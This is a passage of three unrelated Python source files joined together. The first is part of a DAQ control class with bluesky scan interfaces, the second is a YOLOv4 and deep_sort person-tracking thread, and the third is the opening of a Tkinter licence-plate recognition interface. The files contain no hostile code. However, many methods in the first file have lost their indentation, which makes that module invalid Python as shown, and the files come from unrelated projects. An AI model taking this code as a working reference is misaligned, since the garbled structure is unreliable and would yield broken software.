            time.sleep(self.config['begin_sleep'])
            if wait:
                self.wait()
                if end_run:
                    self.end_run()
            if end_run and not wait:
                # End the run in the background once acquisition finishes.
                threading.Thread(target=self._ender_thread, args=()).start()
        except KeyboardInterrupt:
            self.end_run()
            logger.info('%s.begin interrupted, ending run', self.name)
        finally:
            try:
                # Restore the previous record setting, if we overrode it.
                self.preconfig(record=old_record, show_queued_cfg=False)
            except NameError:
                pass
    @property
    def _begin_timeout(self):
        # Allow extra time on top of BEGIN_TIMEOUT because begin may be
        # delayed by up to BEGIN_THROTTLE seconds after a stop.
        return BEGIN_TIMEOUT + BEGIN_THROTTLE
def begin_infinite(self, record=_CONFIG_VAL, use_l3t=_CONFIG_VAL,
controls=_CONFIG_VAL):
"""
Start the daq to run forever in the background.
"""
self.begin(events=0, record=record, use_l3t=use_l3t,
controls=controls, wait=False, end_run=False)
    def _ender_thread(self):
        """
        End the run once the daq stops acquiring (runs in a helper thread).
        """
        self.wait()
        self.end_run()
    @check_connect
    def stop(self):
        """
        Stop the current acquisition, ending it early.
        """
        logger.debug('Daq.stop()')
        self._control.stop()
        # Clear the begin cache and note the stop time for BEGIN_THROTTLE.
        self._reset_begin()
        self._last_stop = time.time()
    @check_connect
    def end_run(self):
        """
        Call `stop`, then mark the run as finished.
        """
        logger.debug('Daq.end_run()')
        self.stop()
        self._control.endrun()
# Reader interface
@check_connect
def trigger(self):
"""
Begin acquisition. This method blocks until the run begins.
Returns a status object that will be marked done when the daq has
stopped acquiring.
This will raise a RuntimeError if the daq was never configured for
events or duration.
Returns
-------
done_status: ``Status``
``Status`` that will be marked as done when the daq has begun.
"""
cfg = self.next_config
if all(cfg[key] is None for key in ('events', 'duration')):
raise RuntimeError('Cannot start daq in scan step, did not '
'configure events or duration.')
self.begin()
return self._get_end_status()
    def read(self):
        """
        Return data. There is no data implemented yet.

        This also stops if running so you can use this device in a bluesky scan
        and wait for "everything else" to be done, then stop the daq
        afterwards.
        """
        if self.state == 'Running':
            self.stop()
        return {}
    def describe(self):
        """
        Explain what read returns. There is nothing yet.
        """
        return {}
# Flyer interface
@check_connect
def kickoff(self, events=_CONFIG_VAL, duration=_CONFIG_VAL,
use_l3t=_CONFIG_VAL, controls=_CONFIG_VAL):
"""
Begin acquisition. This method is non-blocking.
See `begin` for a description of the parameters.
This method does not supply arguments for configuration parameters, it
supplies arguments directly to ``pydaq.Control.begin``. It will
configure before running if there are queued configuration changes.
This is part of the ``bluesky`` ``Flyer`` interface.
Returns
-------
ready_status: ``Status``
``Status`` that will be marked as done when the daq has begun.
"""
logger.debug('Daq.kickoff()')
self._check_duration(duration)
if self._desired_config or not self.configured:
try:
self.configure()
except StateTransitionError:
err = ('Illegal reconfigure with {} during an open run. End '
'the current run with daq.end_run() before running '
'with a new configuration'.format(self._desired_config))
logger.debug(err, exc_info=True)
raise StateTransitionError(err)
check_run_number = all((self.state == 'Configured',
self.config['record'],
not self._check_run_number_has_failed))
if check_run_number:
try:
prev_run = self.run_number()
next_run = prev_run + 1
except Exception:
logger.debug('Error getting run number in kickoff',
exc_info=True)
next_run = None
# Only try this once if it fails to prevent repeated timeouts
self._check_run_number_has_failed = True
else:
next_run = None
def start_thread(control, status, events, duration, use_l3t, controls,
run_number):
tmo = self._begin_timeout
dt = 0.1
logger.debug('Make sure daq is ready to begin')
# Stop and start if we already started
if self.state in ('Open', 'Running'):
self.stop()
# It can take up to 0.4s after a previous begin to be ready
while tmo > 0:
if self.state in ('Configured', 'Open'):
break
else:
tmo -= dt
if self.state in ('Configured', 'Open'):
begin_args = self._begin_args(events, duration, use_l3t,
controls)
if run_number is not None:
logger.info('Beginning daq run %s', run_number)
logger.debug('daq.control.begin(%s)', begin_args)
dt = time.time() - self._last_stop
tmo = BEGIN_THROTTLE - dt
if tmo > 0:
time.sleep(tmo)
control.begin(**begin_args)
# Cache these so we know what the most recent begin was told
self._begin = dict(events=events, duration=duration,
use_l3t=use_l3t, controls=controls)
logger.debug('Marking kickoff as complete')
status.set_finished()
else:
logger.debug('Marking kickoff as failed')
status.set_exception(RuntimeError('Daq begin failed!'))
begin_status = Status(obj=self)
watcher = threading.Thread(target=start_thread,
args=(self._control, begin_status, events,
duration, use_l3t, controls,
next_run))
watcher.start()
return begin_status
def complete(self):
"""
If the daq is freely running, this will `stop` the daq.
Otherwise, we'll simply collect the end_status object.
Returns
-------
end_status: ``Status``
``Status`` that will be marked as done when the DAQ has finished
acquiring
"""
logger.debug('Daq.complete()')
end_status = self._get_end_status()
if not (self._events or self._duration):
# Configured to run forever
self.stop()
return end_status
    def _get_end_status(self):
        """
        Return a `Status` object that will be marked done when the DAQ has
        finished acquiring.

        This will be marked as done immediately if the daq is configured to run
        forever, because waiting for the end doesn't make sense in this case.

        Returns
        -------
        end_status: `Status`
        """
        logger.debug('Daq._get_end_status()')
        events = self._events
        duration = self._duration
        if events or duration:
            logger.debug('Getting end status for events=%s, duration=%s',
                         events, duration)

            def finish_thread(control, status):
                # Block in pydaq until the daq finishes, then mark the status.
                try:
                    logger.debug('Daq.control.end()')
                    control.end()
                except RuntimeError:
                    pass  # This means we aren't running, so no need to wait
                self._last_stop = time.time()
                self._reset_begin()
                status.set_finished()
                logger.debug('Marked acquisition as complete')
            end_status = Status(obj=self)
            watcher = threading.Thread(target=finish_thread,
                                       args=(self._control, end_status))
            watcher.start()
            return end_status
        else:
            # Configured to run forever, say we're done so we can wait for just
            # the other things in the scan
            logger.debug('Returning finished status for infinite run with '
                         'events=%s, duration=%s', events, duration)
            status = Status(obj=self)
            status.set_finished()
            return status
def collect(self):
"""
Collect data as part of the ``bluesky`` ``Flyer`` interface.
As per the ``bluesky`` interface, this is a generator that is expected
to output partial event documents. However, since we don't have any
events to report to python, this will be a generator that immediately
ends.
"""
logger.debug('Daq.collect()')
yield from ()
def describe_collect(self):
"""
As per the ``bluesky`` interface, this is how you interpret the null
data from `collect`. There isn't anything here, as nothing will be
collected.
"""
logger.debug('Daq.describe_collect()')
return {}
    def preconfig(self, events=_CONFIG_VAL, duration=_CONFIG_VAL,
                  record=_CONFIG_VAL, use_l3t=_CONFIG_VAL,
                  controls=_CONFIG_VAL, begin_sleep=_CONFIG_VAL,
                  show_queued_cfg=True):
        """
        Queue configuration parameters for next call to `configure`.

        These will be overridden by arguments passed directly to `configure`.
        These will be cleared after each call to `configure`.
        This can be used to `configure` the `Daq` object without connecting.

        This will display the next queued configuration using logger.info,
        assuming the logger has been configured.
        """
        # Only one of (events, duration) should be preconfigured;
        # whichever is given clears the other.
        if events is not _CONFIG_VAL:
            self._desired_config['events'] = events
            self._desired_config['duration'] = None
        elif duration is not _CONFIG_VAL:
            self._desired_config['events'] = None
            self._desired_config['duration'] = duration
        for arg, name in zip((record, use_l3t, controls, begin_sleep),
                             ('record', 'use_l3t', 'controls', 'begin_sleep')):
            if arg is not _CONFIG_VAL:
                self._desired_config[name] = arg
        if show_queued_cfg:
            self.config_info(self.next_config, 'Queued config:')
    @check_connect
    def configure(self, events=_CONFIG_VAL, duration=_CONFIG_VAL,
                  record=_CONFIG_VAL, use_l3t=_CONFIG_VAL,
                  controls=_CONFIG_VAL, begin_sleep=_CONFIG_VAL):
        """
        Changes the daq's configuration for the next run.

        All arguments omitted from the method call will default to the last
        configured value in the python session.

        This is the method that directly interfaces with the daq. If you simply
        want to get a configuration ready for later, use `preconfig`.

        Parameters
        ----------
        events: ``int``, optional
            If provided, the daq will run for this many events before
            stopping, unless we override in `begin`.
            If not provided, we'll use the ``duration`` argument instead.
            Defaults to its last configured value, or ``None`` on the first
            configure.
        duration: ``int``, optional
            If provided, the daq will run for this many seconds before
            stopping, unless we override in `begin`.
            If not provided, and ``events`` was also not provided, an empty
            call like ``begin()`` will run indefinitely. You can also achieve
            this behavior by passing events=None and/or duration=None, Defaults
            to its last configured value, or ``None`` on the first configure.
        record: ``bool``, optional
            If ``True``, we'll record the data. If ``False``, we'll run without
            recording. If ``None``, we'll use the option selected in the DAQ
            GUI. Defaults to the its last configured value, or ``None`` on the
            first configure.
        use_l3t: ``bool``, optional
            If ``True``, an ``events`` argument to begin will be reinterpreted
            to only count events that pass the level 3 trigger. Defaults to
            its last configured value, or ``False`` on the first configure.
        controls: ``dict{name: device}`` or ``list[device...]``, optional
            If provided, values from these will make it into the DAQ data
            stream as variables. We will check ``device.position`` and
            ``device.value`` for quantities to use and we will update these
            values each time begin is called. To provide a list, all devices
            must have a ``name`` attribute. Defaults to its last configured
            value, or no controls values on the first configure.
        begin_sleep: ``int``, optional
            The amount of time to wait after the DAQ returns begin is done.
            This is a hack because the DAQ often says that a begin transition
            is done without actually being done, so it needs a short delay.
            Defaults to its last configured value, or 0 on the first
            configure.

        Returns
        -------
        old, new: ``tuple`` of ``dict``
            The old configuration and the new configuration. These dictionaries
            are verbose, containing all configuration values and the timestamps
            at which they were configured, as specified by ``bluesky``.
        """
        logger.debug('Daq.configure(events=%s, duration=%s, record=%s, '
                     'use_l3t=%s, controls=%s, begin_sleep=%s)',
                     events, duration, record, use_l3t, controls, begin_sleep)
        state = self.state
        if state not in ('Connected', 'Configured'):
            err = 'Cannot configure from state {}!'.format(state)
            raise StateTransitionError(err)
        self._check_duration(duration)
        old = self.read_configuration()
        # Merge the explicit arguments into the queued configuration, then
        # read back the combined result to apply below.
        self.preconfig(events=events, duration=duration, record=record,
                       use_l3t=use_l3t, controls=controls,
                       begin_sleep=begin_sleep, show_queued_cfg=False)
        config = self.next_config
        events = config['events']
        duration = config['duration']
        record = config['record']
        use_l3t = config['use_l3t']
        controls = config['controls']
        begin_sleep = config['begin_sleep']
        logger.debug('Updated with queued config, now we have: '
                     'events=%s, duration=%s, record=%s, '
                     'use_l3t=%s, controls=%s, begin_sleep=%s',
                     events, duration, record, use_l3t, controls, begin_sleep)
        config_args = self._config_args(record, use_l3t, controls)
        try:
            logger.debug('Daq.control.configure(%s)',
                         config_args)
            self._control.configure(**config_args)
            # self._config should reflect exactly the arguments to configure,
            # this is different than the arguments that pydaq.Control expects
            self._config = dict(events=events, duration=duration,
                                record=record, use_l3t=use_l3t,
                                controls=controls, begin_sleep=begin_sleep)
            self._update_config_ts()
            self.config_info(header='Daq configured:')
        except Exception as exc:
            self._config = None
            msg = 'Failed to configure!'
            logger.debug(msg, exc_info=True)
            raise RuntimeError(msg) from exc
        new = self.read_configuration()
        self._desired_config = {}
        return old, new
def config_info(self, config=None, header='Config:'):
"""
Show the config information as a logger.info message.
This will print to the screen if the logger is configured correctly.
Parameters
----------
config: ``dict``, optional
The configuration to show. If omitted, we'll use the current
config.
header: ``str``, optional
A prefix for the config line.
"""
if config is None:
config = self.config
txt = []
for key, value in config.items():
if value is not None:
txt.append('{}={}'.format(key, value))
if header:
header += ' '
logger.info(header + ', '.join(txt))
    @property
    def record(self):
        """
        If ``True``, we'll configure the daq to record data. If ``False``, we
        will configure the daq to not record data.

        Setting this is the equivalent of scheduling a `configure` call to be
        executed later, e.g. ``configure(record=True)``
        """
        # Read from next_config so queued (not-yet-applied) values show up.
        return self.next_config['record']
    @record.setter
    def record(self, record):
        # Queue the change; it is applied on the next configure/kickoff.
        self.preconfig(record=record)
def _update_config_ts(self):
"""
Create timestamps and update the ``bluesky`` readback for
`read_configuration`
"""
for k, v in self.config.items():
old_value = self._config_ts.get(k, {}).get('value')
if old_value is None or v != old_value:
self._config_ts[k] = dict(value=v,
timestamp=time.time())
def _config_args(self, record, use_l3t, controls):
"""
For a given set of arguments to `configure`, return the arguments that
should be sent to ``pydaq.Control.configure``.
Returns
-------
config_args: dict
"""
logger.debug('Daq._config_args(%s, %s, %s)',
record, use_l3t, controls)
config_args = {}
if record is not None:
config_args['record'] = bool(record)
if use_l3t:
config_args['l3t_events'] = 0
else:
config_args['events'] = 0
if controls is not None:
config_args['controls'] = self._ctrl_arg(controls)
return config_args
def _ctrl_arg(self, controls):
"""
Assemble the list of ``(str, val)`` pairs from a ``{str: device}``
dictionary or a device ``list``
Returns
-------
ctrl_arg: ``list[(str, val), ...]``
"""
ctrl_arg = []
if isinstance(controls, list):
names = [dev.name for dev in controls]
devices = controls
elif isinstance(controls, dict):
names = controls.keys()
devices = controls.values()
for name, device in zip(names, devices):
try:
val = device.position
except AttributeError:
val = device.get()
try:
val = val[0]
except Exception:
pass
ctrl_arg.append((name, val))
return ctrl_arg
    def _begin_args(self, events, duration, use_l3t, controls):
        """
        For a given set of arguments to `begin`, return the arguments that
        should be sent to ``pydaq.Control.begin``

        Returns
        -------
        begin_args: ``dict``
        """
        logger.debug('Daq._begin_args(%s, %s, %s, %s)',
                     events, duration, use_l3t, controls)
        begin_args = {}
        # Handle default args for events and duration
        if events is _CONFIG_VAL and duration is _CONFIG_VAL:
            # If both are omitted, use last configured values
            events = self.config['events']
            duration = self.config['duration']
        if events not in (None, _CONFIG_VAL):
            # We either passed the events arg, or loaded from config
            if use_l3t in (None, _CONFIG_VAL) and self.configured:
                use_l3t = self.config['use_l3t']
            if use_l3t:
                begin_args['l3t_events'] = events
            else:
                begin_args['events'] = events
        elif duration not in (None, _CONFIG_VAL):
            # We either passed the duration arg, or loaded from config
            # pydaq expects [seconds, nanoseconds]
            secs = int(duration)
            nsec = int((duration - secs) * 1e9)
            begin_args['duration'] = [secs, nsec]
        else:
            # We passed None somewhere/everywhere
            begin_args['events'] = 0  # Run until manual stop
        if controls is _CONFIG_VAL:
            controls = self.config['controls']
        if controls is not None:
            begin_args['controls'] = self._ctrl_arg(controls)
        return begin_args
def _check_duration(self, duration):
if duration not in (None, _CONFIG_VAL) and duration < 1:
msg = ('Duration argument less than 1 is unreliable. Please '
'use the events argument to specify the length of '
'very short runs.')
raise RuntimeError(msg)
def read_configuration(self):
"""
``bluesky`` interface for checking the current configuration
Returns
-------
config: ``dict``
Mapping of config key to current configured value and timestamp
when it was last set.
"""
logger.debug('Daq.read_configuration()')
return self._config_ts.copy()
def describe_configuration(self):
"""
``bluesky`` interface for describing how to interpret the configured
values
Returns
-------
config_desc: ``dict``
Mapping of config key to field metadata.
"""
logger.debug('Daq.describe_configuration()')
try:
controls_shape = [len(self.config['controls']), 2]
except (TypeError, RuntimeError, AttributeError):
controls_shape = []
return dict(events=dict(source='daq_events_in_run',
dtype='number',
shape=[]),
duration=dict(source='daq_run_duration',
dtype='number',
shape=[]),
use_l3t=dict(source='daq_use_l3trigger',
dtype='number',
shape=[]),
record=dict(source='daq_record_run',
dtype='number',
shape=[]),
controls=dict(source='daq_control_vars',
dtype='array',
shape=controls_shape),
begin_sleep=dict(source='daq_begin_sleep',
dtype='number',
shape=[]),
)
    def stage(self):
        """
        ``bluesky`` interface for preparing a device for action.

        This sets up the daq to end runs on run stop documents.
        It also caches the current state, so we know what state to return to
        after the ``bluesky`` scan.
        If a run is already started, we'll end it here so that we can start a
        new run during the scan.

        Returns
        -------
        staged: ``list``
            list of devices staged
        """
        logger.debug('Daq.stage()')
        # Remember where we were so `unstage` can restore it.
        self._pre_run_state = self.state
        if self._re_cbid is None:
            self._re_cbid = self._RE.subscribe(self._re_manage_runs)
        self.end_run()
        return [self]
def _re_manage_runs(self, name, doc):
"""
Callback for the RunEngine to manage run stop.
"""
if name == 'stop':
self.end_run()
    def unstage(self):
        """
        ``bluesky`` interface for undoing the `stage` routine.

        Returns
        -------
        unstaged: ``list``
            list of devices unstaged
        """
        logger.debug('Daq.unstage()')
        if self._re_cbid is not None:
            self._RE.unsubscribe(self._re_cbid)
            self._re_cbid = None
        # If we're still running, end now
        if self.state in ('Open', 'Running'):
            self.end_run()
        # Return to the state we had at stage
        if self._pre_run_state == 'Disconnected':
            self.disconnect()
        elif self._pre_run_state == 'Running':
            self.begin_infinite()
        # For other states, end_run was sufficient.
        return [self]
def pause(self):
"""
``bluesky`` interface for determining what to do when a plan is
interrupted. This will call `stop`, but it will not call `end_run`.
"""
logger.debug('Daq.pause()')
if self.state == 'Running':
self.stop()
def resume(self):
"""
``bluesky`` interface for determining what to do when an interrupted
plan is resumed. This will call `begin`.
"""
logger.debug('Daq.resume()')
if self.state == 'Open':
self.begin()
@property
def _events(self):
"""
For the current `begin` cycle, how many ``events`` we told the daq to
run for.
"""
events = self._begin['events']
if events is _CONFIG_VAL:
events = self.config['events']
return events
@property
def _duration(self):
"""
For the current `begin` cycle, how long we told the daq to run for in
seconds.
"""
duration = self._begin['duration']
if duration is _CONFIG_VAL:
duration = self.config['duration']
return duration
def _reset_begin(self):
"""
Reset ``_begin`` to starting values for when we aren't running.
"""
self._begin = dict(events=None, duration=None, use_l3t=None,
controls=None)
    def run_number(self, hutch_name=None):
        """
        Determine the run number of the last run, or current run if running.

        This requires you to be on an NFS-mounted host. If hutch can be
        determined from the get_hutch_name script from engineering_tools, then
        you don't need to pass in a hutch name.

        This is a method and not a property because all properties are
        run when you try to tab complete, and this isn't necessarily an
        instant check. It can also display log messages, which would be
        annoying on tab complete.

        Parameters
        ----------
        hutch_name: ``str``, optional
            The hutch to check the run number for. If omitted, we'll guess
            the hutch based on your session details.

        Returns
        -------
        run_number: ``int``
            The current run number, or previous run if not recording.

        Raises
        ------
        RuntimeError:
            if we have no access to NFS
        ValueError:
            if an invalid hutch was passed
        subprocess.TimeoutExpired:
            if the get run number script fails
        """
        try:
            if hutch_name is None:
                hutch_name = ext_scripts.hutch_name()
            if hutch_name not in ('amo', 'sxr', 'xpp', 'xcs', 'mfx', 'cxi',
                                  'mec', 'tst'):
                raise ValueError(('{} is not a valid hutch, cannot determine '
                                  'run number'.format(hutch_name)))
            # live=True queries the in-progress run; otherwise the last run.
            if self.state in ('Open', 'Running') and self.config['record']:
                return ext_scripts.get_run_number(hutch=hutch_name, live=True)
            else:
                return ext_scripts.get_run_number(hutch=hutch_name, live=False)
        except FileNotFoundError:
            raise RuntimeError('No nfs access, cannot determine run number.')
def __del__(self):
    # Best-effort disconnect when this object is garbage collected.
    # Exceptions are deliberately swallowed: raising from __del__
    # (possibly during interpreter shutdown) only produces noise.
    try:
        self.disconnect()
    except Exception:
        pass
def set_filter(self, *args, event_codes=None, operator='&',
               or_bykik=False):
    """
    Set up the l3t filters.

    These connect through pyami to call set_l3t or clear_l3t. The function
    takes in arbitrary dets whose prefixes are the ami names, along with
    low and highs.

    Event codes are handled as a special case, since you always want high
    vs low.

    .. note::
        If or_bykik is True, this will treat bykik at an l3t pass! This is
        so you don't lose your off shots when the l3t trigger is in veto
        mode.

    Parameters
    ----------
    *args: (`AmiDet`, ``float``, ``float``) n times
        A sequence of (detector, low, high), which create filters that make
        sure the detector is between low and high. You can omit the first
        `AmiDet` as a shorthand for the current monitor, assuming a monitor
        has been set with `Daq.set_monitor` or `set_monitor_det`.

    event_codes: ``list``, optional
        A list of event codes to include in the filter. l3pass will be when
        the event code is present.

    operator: ``str``, optional
        The operator for combining the detector ranges and event codes.
        This can either be ``|`` to ``or`` the conditions together, so
        l3pass will happen if any filter passes, or it can be left at
        the default ``&`` to ``and`` the conditions together, so l3pass
        will only happen if all filters pass.

    or_bykik: ``bool``, optional
        False by default, appends an ``or`` condition that marks l3t pass
        when we see the bykik event code. This makes sure the off shots
        make it into the data if we're in l3t veto mode.
    """
    # Thin delegation: the module-level helper owns the pyami interaction;
    # this method just exposes it as a convenient Daq-level API.
    return set_pyami_filter(*args, event_codes=event_codes,
                            operator=operator, or_bykik=or_bykik)
def set_monitor(self, det):
    # Thin wrapper around the module-level set_monitor_det; see that
    # function for the full documentation.
    return set_monitor_det(det)
# Reuse the wrapped function's docstring so help(Daq.set_monitor)
# shows the real documentation instead of nothing.
set_monitor.__doc__ = set_monitor_det.__doc__
class StateTransitionError(Exception):
    """Error type for invalid DAQ state transitions (raised elsewhere in
    this module)."""
    pass
# Module-level slot holding the one true Daq instance; see register_daq.
_daq_instance = None


def register_daq(daq):
    """
    Record the singleton `Daq` instance for later retrieval via `get_daq`.

    Called by `Daq` at the end of ``__init__``. There will always only be
    one `Daq`, so a simple module-level slot suffices.

    Parameters
    ----------
    daq: `Daq`
    """
    global _daq_instance
    _daq_instance = daq


def get_daq():
    """
    Return the `Daq` instance previously stored by `register_daq`.

    Returns
    -------
    daq: `Daq`
    """
    return _daq_instance
|
object_tracking.py |
import time
import cv2
import numpy as np
import matplotlib.pyplot as plt
from threading import Thread, Lock
from collections import deque
from deep_sort import preprocessing
from deep_sort import nn_matching
from deep_sort.detection import Detection
from deep_sort.tracker import Tracker
from deep_sort.detection import Detection as ddet
from yolov4_detection import ObjectDetectionEngine
from datetime import datetime
import areaEquation as Area
from ai_logging import LOG
# deep_sort tuning: max cosine distance for appearance matching, the
# non-max-suppression overlap threshold, and the feature budget
# (None = unbounded).
max_cosine_distance = 0.5
nms_max_overlap = 0.3
nn_budget = None
# Module-global metric and tracker: every ObjectTracking thread in this
# process updates the same TRACKER instance.
METRIC = nn_matching.NearestNeighborDistanceMetric("cosine", max_cosine_distance, nn_budget)
TRACKER = Tracker(METRIC)
# Object pool for each video line
ObjectPools={'lock': Lock(), 'cam000xxx' : None}
class ObjectTracking(Thread):
    """
    Per-camera tracking worker.

    A helper thread continuously pulls frames from ``stream`` into a
    bounded buffer; the main loop runs YOLOv4 detection plus deep_sort
    tracking on the buffered frames, draws the tracked boxes, and pushes
    the annotated frame together with per-person metadata into
    ``framePools`` for downstream consumers.
    """
    def __init__(self, camera_id, stream):
        Thread.__init__(self)
        # Buffer length for both frame pools; deque(maxlen=...) silently
        # discards the oldest entries when full.
        self.QUELENG = 3
        self.isrun = False
        self.camera_id = camera_id
        self.stream = stream
        # Raw frames from the capture thread / annotated output frames.
        self.origin_framePools = deque(maxlen=self.QUELENG)
        self.framePools = deque(maxlen=self.QUELENG)
        self.object_detection_engine = ObjectDetectionEngine()
        ### area equation init ###
        self.area_equation = Area.areaEquation(self.camera_id, '', [], [])
    def run(self):
        """Main loop: detect + track on buffered frames until stop() is called."""
        # by default VideoCapture returns float instead of int
        #LOG.info(self.stream)
        #width = int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH))
        #LOG.info(width)
        #height = int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT))
        #LOG.info(height)
        #fps = int(self.stream.get(cv2.CAP_PROP_FPS))
        #LOG.info(fps)
        ### use for output avi video file ###
        #codec = cv2.VideoWriter_fourcc(*'MJPG')
        #out = cv2.VideoWriter('video_out.avi', codec, fps, (width, height))
        self.isrun = True
        # Background reader keeps origin_framePools topped up.
        th = Thread(target=lambda: self.get_frame_thread())
        th.start()
        # Wait until at least one frame has been captured.
        while len(self.origin_framePools) == 0:
            time.sleep(0.1)
        while self.isrun:
            # NOTE(review): this peeks at the oldest buffered frame without
            # popping it; new frames displace old ones only via maxlen, so
            # the same frame may be processed more than once.
            (return_value, frame) = self.origin_framePools[0]
            #return_value, frame = self.stream.read()
            #LOG.info(return_value)
            if return_value:
                frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
                #image = Image.fromarray(frame)
            else:
                LOG.info('Video has ended or failed, try a different video format!')
                break
            #execute object detect
            start_time = time.time()
            results = self.object_detection_engine.perform_detection(frame)
            label_list = []
            my_rects = []
            my_labels = []
            # Convert detector output (xmin, ymin, xmax, ymax, label) into
            # deep_sort's (x, y, w, h) box format.
            for item in results:
                xmin = item[0]
                ymin = item[1]
                xmax = item[2]
                ymax = item[3]
                label = item[4]
                feature_w = abs(xmin-xmax)
                feature_h = abs(ymin-ymax)
                my_rects.append([xmin, ymin, feature_w, feature_h])
                my_labels.append(label)
            result_data = []
            detections = [Detection(bbox, 1.0, None,label) for bbox, label in zip(my_rects, my_labels)]
            #initialize color map
            cmap = plt.get_cmap('tab20b')
            colors = [cmap(i)[:3] for i in np.linspace(0, 1, 20)]
            # Non-max suppression to drop heavily-overlapping detections.
            boxes = np.array([d.tlwh for d in detections])
            scores = np.array([d.confidence for d in detections])
            indices = preprocessing.non_max_suppression(boxes, nms_max_overlap, scores)
            detections = [detections[i] for i in indices]
            # Advance the (module-global, shared) tracker with this frame.
            TRACKER.predict()
            TRACKER.update(detections)
            deleted_id = []
            for track in TRACKER.deleted_tracks:
                deleted_id.append(track.track_id)
            persons = []
            for track in TRACKER.tracks:
                # Skip tentative tracks and tracks that missed this update.
                if not track.is_confirmed() or track.time_since_update > 1:
                    continue
                bbox = track.to_tlbr()
                class_name = 'person'
                result_data.append((bbox[0],bbox[1],bbox[2],bbox[3],int(track.track_id),track.label,deleted_id))
                # draw bbox on screen
                color = colors[int(track.track_id) % len(colors)]
                color = [i * 255 for i in color]
                cv2.rectangle(frame, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), color, 2)
                cv2.rectangle(frame, (int(bbox[0]), int(bbox[1]-30)), (int(bbox[0])+(len(class_name)+len(str(track.track_id)))*17, int(bbox[1])), color, -1)
                cv2.putText(frame, class_name + "-" + str(track.track_id),(int(bbox[0]), int(bbox[1]-10)),0, 0.75, (255,255,255),2)
                '''
                # if enable info flag then LOG.info details about each track
                # checking area for warning and danger
                #LOG.info(len(bbox))
                #LOG.info("Tracker ID: {}, Class: {}, BBox Coords (xmin, ymin, xmax, ymax): {}".format(str(track.track_id), class_name, (int(bbox[0]), int(bbox[1]), int(bbox[2]), int(bbox[3]))))
                ### bbox === [xmin, ymin, xmax, ymax] ###
                #point1 = [int(bbox[0]), int(bbox[1])] # xmin, ymin
                #point2 = [int(bbox[2]), int(bbox[1])] # xmax, ymin
                #point1 = [int(bbox[0]), int(bbox[3])] # xmin, ymax
                #point2 = [int(bbox[2]), int(bbox[3])] # xmax, ymax
                '''
                person = {}
                person["person_id"] = track.track_id
                person["bbox"] = bbox
                person["time_in"] = str(datetime.now())
                person["equiqments"] = []
                persons.append(person)
            # calculate frames per second of running detections
            fps = 1.0 / (time.time() - start_time)
            cv2.putText(frame, "FPS: %.2f" % fps, (8, 32), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (100, 255, 0), 3, cv2.LINE_AA)
            #LOG.info("CameraID: %s, FPS: %.2f" % (self.camera_id, fps))
            # NOTE(review): this np.asarray result is dead code — it is
            # immediately overwritten by the cvtColor call below.
            result = np.asarray(frame)
            result = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
            #LOG.info(type(result))
            frame_info = {}
            frame_info['frame'] = result
            frame_info['persons'] = persons
            #LOG.info(frame_info)
            self.framePools.append(frame_info)
            #out.write(result)
            # NOTE(review): cv2.waitKey only reads keys with an active
            # HighGUI window; here it mostly acts as a ~1ms delay.
            if cv2.waitKey(1) & 0xFF == ord('q'): break
        th.join()
    def get_frame_thread(self):
        # Capture loop (helper thread): read frames at roughly 33 fps into
        # the bounded origin_framePools buffer.
        while self.isrun:
            return_value, frame = self.stream.read()
            self.origin_framePools.append((return_value, frame))
            time.sleep(1/33)
    def stop(self):
        # Signal both the run() loop and the capture thread to exit.
        self.isrun = False
|
surface.py | import tkinter as tk
from tkinter.filedialog import *
from tkinter import ttk
import predict
import cv2
from PIL import Image, ImageTk
import threading
import time
from tkinter import messagebox
import webbrowser
class Surface(ttk.Frame):
    """
    Main UI frame for the license-plate recognition demo.

    The left pane shows the source image (from a picture file or the
    camera), the right pane shows the located plate region, the recognized
    text and the plate color. A third button opens the Baidu web API page.
    """
    # Class-level defaults; instance assignments shadow them as needed.
    pic_path = ""
    viewhigh = 600       # max display height for the source image
    viewwide = 600       # max display width for the source image
    update_time = 0      # timestamp of the last successful recognition
    thread = None        # camera capture/recognition thread
    thread_run = False   # flag polled by vedio_thread to keep running
    camera = None        # lazily-opened cv2.VideoCapture
    # plate color key -> (display label, background color).
    # NOTE: the "yello" spelling must match the color strings produced by
    # the predict module — do not "fix" it here alone.
    color_transform = {"green":("绿牌","#55FF55"), "yello":("黄牌","#FFFF00"), "blue":("蓝牌","#6666FF")}

    def __init__(self, win):
        """Build the widget layout and train the SVM-based predictor."""
        ttk.Frame.__init__(self, win)
        frame_left = ttk.Frame(self)
        frame_right1 = ttk.Frame(self)
        frame_right2 = ttk.Frame(self)
        frame_center = ttk.Frame(self)
        win.title("车牌识别")
        win.state("zoomed")
        self.pack(fill=tk.BOTH, expand=tk.YES, padx="5", pady="5")
        frame_left.pack(side=LEFT, expand=1, fill=BOTH)
        frame_right1.pack(side=TOP, expand=1, fill=tk.Y)
        frame_right2.pack(side=RIGHT, expand=0)
        frame_center.pack(side=LEFT, expand=1, fill=BOTH)
        Label(frame_center,text="==\n|欢|\n|迎|\n|使|\n|用|\n|车|\n|牌|\n|识|\n|别|\n|系|\n|统|\n==",fg="red",font = 'Helvetica -49 bold').pack(anchor="nw")
        Label(frame_left, text='原图:',font = 'Helvetica -27 bold').pack(anchor="nw")
        Label(frame_right1, text='车牌位置:',font = 'Helvetica -27 bold').grid(column=0, row=0, sticky=tk.W)
        from_pic_ctl = Button(frame_right2,text="来自图片",font = 'Helvetica -29 bold',bg="grey",fg="yellow",width=20, command=self.from_pic)
        from_vedio_ctl = Button(frame_right2, text="来自摄像头",font = 'Helvetica -29 bold',bg="grey",fg="yellow",width=20, command=self.from_vedio)
        button3 = Button(frame_right2,text="api再识别",font = 'Helvetica -29 bold',bg="grey",fg="yellow",width=20,command=self.api)
        self.image_ctl = ttk.Label(frame_left)
        self.image_ctl.pack(anchor="nw")
        self.roi_ctl = ttk.Label(frame_right1)
        self.roi_ctl.grid(column=0, row=1, sticky=tk.W)
        Label(frame_right1, text='识别结果:',font = 'Helvetica -29 bold').grid(column=0, row=2, sticky=tk.W)
        self.r_ctl = ttk.Label(frame_right1, text="")
        self.r_ctl.grid(column=0, row=3, sticky=tk.W)
        self.color_ctl = ttk.Label(frame_right1, text="", width="20")
        self.color_ctl.grid(column=0, row=4, sticky=tk.W)
        from_vedio_ctl.pack(anchor="se", pady="5")
        from_pic_ctl.pack(anchor="se", pady="5")
